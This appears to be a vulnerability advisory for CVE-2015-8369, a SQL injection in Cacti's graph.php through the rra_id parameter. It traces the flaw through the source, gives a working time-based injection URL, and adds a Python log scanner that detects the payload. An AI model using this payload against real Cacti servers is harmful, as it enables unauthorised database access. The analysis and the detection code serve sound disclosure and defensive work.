### 0x01 Vulnerability Summary
Cacti is an open-source network traffic monitoring and analysis tool maintained by the Cacti Group. It collects data via snmpget, renders graphs with RRDtool for analysis, and provides data and user management features.
Cacti versions before 0.8.8f contain a SQL injection vulnerability that allows a remote attacker to execute arbitrary SQL commands via the rra_id parameter in a properties action to graph.php.
### 0x02 Vulnerability Details
The relevant code starts in the file /cacti-0.8.8f/graph.php at line 25:
```
include_once("./include/top_graph_header.php");
/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = "view"; }
if (!isset($_REQUEST["view_type"])) { $_REQUEST["view_type"] = ""; }
/* note: $_REQUEST and $guest_account were lost when this page was extracted and are restored here from the Cacti source */
$guest_account = true;
include("./include/auth.php");
include_once("./lib/rrd.php");
api_plugin_hook_function('graph');
include_once("./lib/html_tree.php");
include_once("./include/top_graph_header.php");
/* ================= input validation ================= */
input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
input_validate_input_number(get_request_var("local_graph_id"));
input_validate_input_number(get_request_var("graph_end"));
input_validate_input_number(get_request_var("graph_start"));
input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$");
/* ==================================================== */
```
Now /cacti-0.8.8f/include/top_graph_header.php, line 30: unlike graph.php, this file does not validate the rra_id parameter
```
/* ================= input validation ================= */
input_validate_input_number(get_request_var_request("local_graph_id"));
input_validate_input_number(get_request_var_request("graph_start"));
input_validate_input_number(get_request_var_request("graph_end"));
/* ==================================================== */
```
Continuing to trace, line 158 of the same file:
```
$graph_data_array["print_source"] = true;
/* override: graph start time (unix time) */
if (!empty($_GET["graph_start"])) {
    $graph_data_array["graph_start"] = get_request_var_request("graph_start");
}
/* override: graph end time (unix time) */
if (!empty($_GET["graph_end"])) {
    $graph_data_array["graph_end"] = get_request_var_request("graph_end");
}
print trim(@rrdtool_function_graph(get_request_var_request("local_graph_id"), get_request_var_request("rra_id"), $graph_data_array));
?>
```
The unvalidated rra_id then reaches \cacti-0.8.8f\lib\rrd.php, function rrdtool_function_graph, line 631:
```
            $rra["timespan"] = 86400;
        }else{
            /* get a list of RRAs related to this graph */
            $rras = get_associated_rras($local_graph_id);
            if (sizeof($rras) > 0) {
                foreach ($rras as $unchosen_rra) {
                    /* the timespan specified in the RRA "timespan" field may not be accurate */
                    $real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);
                    /* make sure the current start/end times fit within each RRA's timespan */
                    if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) <= $real_timespan) && ((time() - $graph_data_array["graph_start"]) <= $real_timespan) ) {
                        /* is this RRA better than the already chosen one? */
                        if ((isset($rra)) && ($unchosen_rra["steps"] < $rra["steps"])) {
                            $rra = $unchosen_rra;
                        }else if (!isset($rra)) {
                            $rra = $unchosen_rra;
                        }
                    }
                }
            }
            if (!isset($rra)) {
                $rra["rows"] = 600;
                $rra["steps"] = 1;
            }
        }
    }else{
        // sql injection here
        $rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");
    }
```
Exploitation:
```
http://192.168.x.x/cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776
```
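graph.php already whitelists rra_id with `^([0-9]+|all)$` while top_graph_header.php does not, so applying that same whitelist to logged graph.php requests flags every value that could only have reached the unvalidated SQL in rrdtool_function_graph. The following Python script is an added example, not code from the original post or from the Cacti project; the access-log lines are constructed and the function names are assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Whitelist graph.php applies to rra_id (from the page); the print_source path in
# top_graph_header.php skips it, so a logged value that fails it hit the raw SQL.
RRA_ID_WHITELIST = re.compile(r"^([0-9]+|all)$")

# Apache combined-format line: client IP, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (hypothetical hosts); the third request carries the
# page's proof-of-concept value, the others are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Dec/2015:10:00:01 +0000] "GET /cacti/graph.php?action=properties&local_graph_id=1&rra_id=1&view_type= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Dec/2015:10:00:02 +0000] "GET /cacti/graph.php?action=view&local_graph_id=1&rra_id=all HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Dec/2015:10:00:03 +0000] "GET /cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776 HTTP/1.1" 200 5120 "-" "curl/7.47.0"
10.0.0.9 - - [09/Dec/2015:10:00:04 +0000] "GET /cacti/index.php HTTP/1.1" 200 2048 "-" "curl/7.47.0"
"""

def rejected_rra_id(target):
    """Return (action, decoded rra_id) when the request is to graph.php and
    its rra_id would fail graph.php's whitelist; otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/graph.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    action = params.get("action", ["view"])[0]  # graph.php defaults to "view"
    for value in params.get("rra_id", []):
        if not RRA_ID_WHITELIST.fullmatch(value):
            return action, value
    return None

def scan_log(text):
    """Collect (ip, timestamp, action, rra_id) for every hit in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m is None:
            continue
        bad = rejected_rra_id(m.group("target"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("ts")) + bad)
    return hits

if __name__ == "__main__":
    for ip, ts, action, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} action={action} rra_id={value!r}")
```

A hit with action=properties is the exact path the page traces; any other hit still deserves a look, since top_graph_header.php never validated the parameter regardless of action.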
### 0x03 References
FULLDISC:20151209 [CVE-2015-8369] Cacti SQL injection in graph.php
URL:http://seclists.org/fulldisclosure/2015/Dec/8
MISC:http://bugs.cacti.net/view.php?id=2646